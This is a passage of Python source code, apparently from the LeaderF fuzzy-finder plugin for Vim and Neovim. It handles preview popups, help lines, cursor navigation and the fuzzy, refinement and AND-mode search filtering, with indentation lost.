lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
col = 0
elif preview_pos.lower() == 'left':
col = 1
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns"))//2 + 2
else:
col = "cursor"
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 4"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": "botleft",
"line": "cursor-1",
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if self._current_mode == 'NORMAL':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#normalModePreviewFilter', [%d]))"
% (self._preview_winid, id(self)))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
def _needPreview(self, preview):
"""
Args:
preview:
if True, always preview the result no matter what `g:Lf_PreviewResult` is.
"""
preview_dict = {k.lower(): v for k, v in lfEval("g:Lf_PreviewResult").items()}
category = self._getExplorer().getStlCategory()
if not preview and int(preview_dict.get(category.lower(), 0)) == 0:
return False
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
self._orig_line = self._getInstance().currentLine
return False
elif self._getInstance().window.cursor[0] <= self._help_length:
self._orig_line = self._getInstance().currentLine
return False
if self._getInstance().empty() or (self._getInstance().getWinPos() != 'popup' and
vim.current.buffer != self._getInstance().buffer):
return False
if self._ctrlp_pressed == True:
return True
line = self._getInstance().currentLine
if self._orig_line == line and (self._getInstance().buffer.options['modifiable']
or self._getInstance().getWinPos() in ('popup', 'floatwin')):
return False
self._orig_line = self._getInstance().currentLine
return True
def _getInstance(self):
if self._instance is None:
self._instance = LfInstance(self, self._getExplorer().getStlCategory(),
self._cli,
self._beforeEnter,
self._afterEnter,
self._beforeExit,
self._afterExit)
return self._instance
def _createHelpHint(self):
help = []
if not self._show_help:
if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0':
help.append('" Press <F1> for help')
help.append('" ---------------------------------------------------------')
else:
help += self._createHelp()
self._help_length = len(help)
orig_row = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help[::-1])
self._getInstance().buffer.options['modifiable'] = False
buffer_len = len(self._getInstance().buffer)
if buffer_len < self._initial_count:
if "--nowrap" not in self._arguments:
self._getInstance().window.height = min(self._initial_count,
self._getInstance()._actualLength(self._getInstance().buffer))
else:
self._getInstance().window.height = buffer_len
elif self._getInstance().window.height < self._initial_count:
self._getInstance().window.height = self._initial_count
lfCmd("normal! Gzb")
self._getInstance().window.cursor = (orig_row, 0)
else:
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help, 0)
self._getInstance().buffer.options['modifiable'] = False
self._getInstance().window.cursor = (orig_row + self._help_length, 0)
self._getInstance().mimicCursor()
self._getInstance().refreshPopupStatusline()
def _hideHelp(self):
self._getInstance().buffer.options['modifiable'] = True
if self._getInstance().isReverseOrder():
orig_row = self._getInstance().window.cursor[0]
countdown = len(self._getInstance().buffer) - orig_row - self._help_length
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:]
lfCmd("normal! Gzb")
if 0 < countdown < self._initial_count:
self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0)
else:
self._getInstance().window.cursor = (len(self._getInstance().buffer), 0)
self._getInstance().setLineNumber()
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._help_length = 0
self._getInstance().refreshPopupStatusline()
def _inHelpLines(self):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
return True
elif self._getInstance().window.cursor[0] <= self._help_length:
return True
return False
def _getExplorer(self):
if self._explorer is None:
self._explorer = self._getExplClass()()
return self._explorer
def _resetAutochdir(self):
if int(lfEval("&autochdir")) == 1:
self._autochdir = 1
lfCmd("set noautochdir")
else:
self._autochdir = 0
def _setAutochdir(self):
if self._autochdir == 1:
# When autochdir is set, Vim will change the current working directory
# to the directory containing the file which was opened or selected.
lfCmd("set autochdir")
def _toUpInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! k")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! 10k')" % (self._preview_winid))
def _toDownInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! j")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! 10j')" % (self._preview_winid))
def _toUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! k')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
adjust = False
if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1:
adjust = True
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd("norm! k")
if adjust:
lfCmd("norm! zt")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _toDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! j')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder() \
and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height:
self._setResultContent()
lfCmd("norm! j")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _pageUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageUp>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if self._getInstance().isReverseOrder():
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd('exec "norm! \<PageUp>"')
self._getInstance().setLineNumber()
def _pageDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageDown>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder():
self._setResultContent()
lfCmd('exec "norm! \<PageDown>"')
self._getInstance().setLineNumber()
def _leftClick(self):
if self._getInstance().getWinPos() == 'popup':
if int(lfEval("has('patch-8.1.2266')")) == 1:
if self._getInstance().getPopupWinId() == int(lfEval("v:mouse_winid")):
lfCmd("""call win_execute(%d, "exec v:mouse_lnum")"""
% (self._getInstance().getPopupWinId()))
lfCmd("""call win_execute(%d, "exec 'norm!'.v:mouse_col.'|'")"""
% (self._getInstance().getPopupWinId()))
exit_loop = False
elif self._getInstance().window.number == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._getInstance().setLineNumber()
self.clearSelections()
exit_loop = False
elif self._preview_winid == int(lfEval("v:mouse_winid")):
if lfEval("has('nvim')") == '1':
lfCmd("call win_gotoid(%d)" % self._preview_winid)
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._current_mode = 'NORMAL'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
exit_loop = True
else:
self.quit()
exit_loop = True
return exit_loop
def _search(self, content, is_continue=False, step=0):
if not is_continue:
self.clearSelections()
self._clearHighlights()
self._clearHighlightsPos()
self._cli.highlightMatches()
if not self._cli.pattern: # e.g., when <BS> or <Del> is typed
if self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
else:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
self._previewResult(False)
return
if self._cli.isFuzzy:
self._fuzzySearch(content, is_continue, step)
else:
self._regexSearch(content, is_continue, step)
self._previewResult(False)
def _filter(self, step, filter_method, content, is_continue,
use_fuzzy_engine=False, return_index=False):
""" Construct a list from result of filter_method(content).
Args:
step: An integer indicating how many lines to filter at a time.
filter_method: A function that takes `content` as its parameter and
returns an iterable.
content: The list to be filtered.
"""
unit = self._getUnit()
step = step // unit * unit
length = len(content)
if self._index == 0:
self._cb_content = []
self._result_content = []
self._index = min(step, length)
cur_content = content[:self._index]
else:
if not is_continue and self._result_content:
if self._cb_content:
self._cb_content += self._result_content
else:
self._cb_content = self._result_content
if len(self._cb_content) >= step:
cur_content = self._cb_content[:step]
self._cb_content = self._cb_content[step:]
else:
cur_content = self._cb_content
left = step - len(self._cb_content)
self._cb_content = []
if self._index < length:
end = min(self._index + left, length)
cur_content += content[self._index:end]
self._index = end
if self._cli.isAndMode:
result, highlight_methods = filter_method(cur_content)
if is_continue:
self._previous_result = (self._previous_result[0] + result[0],
self._previous_result[1] + result[1])
result = self._previous_result
else:
self._previous_result = result
return (result, highlight_methods)
elif use_fuzzy_engine:
if return_index:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
result = (result[0], [cur_content[i] for i in result[1]])
else:
result = filter_method(source=cur_content)
if is_continue:
result = fuzzyEngine.merge(self._previous_result, result)
self._previous_result = result
else:
result = list(filter_method(cur_content))
if is_continue:
self._previous_result += result
result = self._previous_result
else:
self._previous_result = result
return result
def _fuzzyFilter(self, is_full_path, get_weight, iterable):
"""
return a generator of (weight, line) pairs
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
pairs = ((get_weight(getDigest(line)), line) for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return (p for p in pairs if p[0] > MIN_WEIGHT)
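# For illustration: with the pattern "ab", this might yield pairs such as
# (150.0, 'abc.txt') and (80.0, 'a_b.py'); pairs whose weight does not exceed
# MIN_WEIGHT are dropped. The concrete weight values are hypothetical -- they
# depend on the FuzzyMatch / fuzzyMatchC scoring implementation.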
def _fuzzyFilterEx(self, is_full_path, get_weight, iterable):
"""
return a tuple, (weights, indices)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
iterable = itertools.islice(iterable, 0, None, self._getUnit())
pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable))
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
result = [p for p in pairs if p[0] > MIN_WEIGHT]
if len(result) == 0:
weights, indices = [], []
else:
weights, indices = zip(*result)
return (list(weights), list(indices))
def _refineFilter(self, first_get_weight, get_weight, iterable):
getDigest = self._getDigest
triples = ((first_get_weight(getDigest(line, 1)),
get_weight(getDigest(line, 2)), line)
for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT)
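# _refineFilter() serves the refinement pattern "abc;def": the first pattern is
# scored against getDigest(line, 1) and the second against getDigest(line, 2);
# a line survives only if both scores exceed MIN_WEIGHT, and the two scores are
# summed to give the final ranking weight.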
def _andModeFilter(self, iterable):
encoding = lfEval("&encoding")
cur_content = iterable
weight_lists = []
highlight_methods = []
for p in self._cli.pattern:
use_fuzzy_engine = False
if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=False, is_and_mode=True)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=False, is_and_mode=True)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=False, is_and_mode=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False)
elif is_fuzzyMatch_C and isAscii(p):
pattern = fuzzyMatchC.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False)
else:
fuzzy_match = FuzzyMatch(p, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights,
clear=False)
if use_fuzzy_engine:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
else:
result = filter_method(cur_content)
for i, wl in enumerate(weight_lists):
weight_lists[i] = [wl[j] for j in result[1]]
weight_lists.append(result[0])
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
unit = self._getUnit()
result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]]
cur_content = list(itertools.chain.from_iterable(result_content))
else:
cur_content = [cur_content[i] for i in result[1]]
result_content = cur_content
highlight_methods.append(highlight_method)
weights = [sum(i) for i in zip(*weight_lists)]
return ((weights, result_content), highlight_methods)
def _fuzzySearch(self, content, is_continue, step):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
use_fuzzy_match_c = False
do_sort = "--no-sort" not in self._arguments
if self._cli.isAndMode:
filter_method = self._andModeFilter
elif self._cli.isRefinement:
if self._cli.pattern[1] == '': # e.g. abc;
if self._fuzzy_engine and isAscii(self._cli.pattern[0]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[0])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
elif self._cli.pattern[0] == '': # e.g. ;abc
if self._fuzzy_engine and isAscii(self._cli.pattern[1]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[1])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else: # e.g. abc;def
if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
is_ascii_0 = True
pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True)
getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True)
else:
is_ascii_0 = False
fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight_0 = fuzzy_match_0.getWeightNoSort
else:
getWeight_0 = fuzzy_match_0.getWeight
getHighlights_0 = fuzzy_match_0.getHighlights
if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
is_ascii_1 = True
pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False)
getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False)
else:
is_ascii_1 = False
fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight_1 = fuzzy_match_1.getWeightNoSort
else:
getWeight_1 = fuzzy_match_1.getWeight
getHighlights_1 = fuzzy_match_1.getHighlights
use_fuzzy_match_c = is_ascii_0 and is_ascii_1
filter_method = partial(self._refineFilter, getWeight_0, getWeight_1)
highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1)
else:
if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File":
return_index = False
if self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_File,
param=fuzzyEngine.createParameter(1),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Rg":
return_index = False
if "--match-path" in self._arguments:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Rg,
param=fuzzyEngine.createRgParameter(self._getExplorer().displayMulti(),
self._getExplorer().getContextSeparator(), self._has_column),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Tag":
return_index = False
mode = 0 if self._cli.isFullPath else 1
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Tag,
param=fuzzyEngine.createParameter(mode), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Gtags":
return_index = False
result_format = 1
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
result_format = 0
elif self._getExplorer().getResultFormat() == "ctags-x":
result_format = 2
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Gtags,
param=fuzzyEngine.createGtagsParameter(0, result_format, self._match_path),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Line":
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Line,
param=fuzzyEngine.createParameter(1), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern, encoding)
if "--no-sort" in self._arguments:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeightNoSort)
elif self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights)
if self._cli.isAndMode:
if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)):
step = 20000 * cpu_count
else:
step = 10000
pair, highlight_methods = self._filter(step, filter_method, content, is_continue)
if do_sort:
pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
else:
self._result_content = pair[1]
elif use_fuzzy_engine:
if step == 0:
if return_index == True:
step = 30000 * cpu_count
else:
step = 60000 * cpu_count
_, self._result_content = self._filter(step, filter_method, content, is_continue, True, return_index)
else:
if step == 0:
if use_fuzzy_match_c:
step = 60000
elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath:
step = 6000
else:
step = 12000
pairs = self._filter(step, filter_method, content, is_continue)
if "--no-sort" not in self._arguments:
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
if self._cli.isAndMode:
self._highlight_method = partial(self._highlight_and_mode, highlight_methods)
self._highlight_method()
else:
self._highlight_method = highlight_method
self._highlight_method()
if len(self._cli.pattern) > 1 and not is_continue:
lfCmd("redraw")
def _guessFilter(self, filename, suffix, dirname, icon, iterable):
"""
return a generator of (weight, line) pairs
"""
icon_len = len(icon)
return ((FuzzyMatch.getPathWeight(filename, suffix, dirname, line[icon_len:]), line) for line in iterable)
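# _guessFilter() is used when the query is empty for the File category: each
# line is weighted by FuzzyMatch.getPathWeight() against the current buffer's
# filename, suffix and directory (with any devicon prefix stripped), presumably
# so that files related to the current buffer are ranked first.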
def _guessSearch(self, content, is_continue=False, step=0):
if self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
buffer_name = os.path.normpath(lfDecode(self._cur_buffer.name))
if lfEval("g:Lf_ShowRelativePath") == '1':
try:
buffer_name = os.path.relpath(buffer_name)
except ValueError:
pass
buffer_name = lfEncode(buffer_name)
dirname, basename = os.path.split(buffer_name)
filename, suffix = os.path.splitext(basename)
if lfEval("get(g:, 'Lf_ShowDevIcons', 1)") == "1":
icon = webDevIconsGetFileTypeSymbol(basename)
else:
icon = ''
if self._fuzzy_engine:
filter_method = partial(fuzzyEngine.guessMatch, engine=self._fuzzy_engine, filename=filename,
suffix=suffix, dirname=dirname, icon=icon, sort_results=True)
step = len(content)
_, self._result_content = self._filter(step, filter_method, content, is_continue, True)
else:
step = len(content)
filter_method = partial(self._guessFilter, filename, suffix, dirname, icon)
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def _highlight_and_mode(self, highlight_methods):
self._clearHighlights()
for i, highlight_method in enumerate(highlight_methods):
highlight_method(hl_group='Lf_hl_match' + str(i % 5))
def _clearHighlights(self):
if self._getInstance().getWinPos() == 'popup':
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._highlight_ids = []
def _clearHighlightsPos(self):
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
def _resetHighlights(self):
self._clearHighlights()
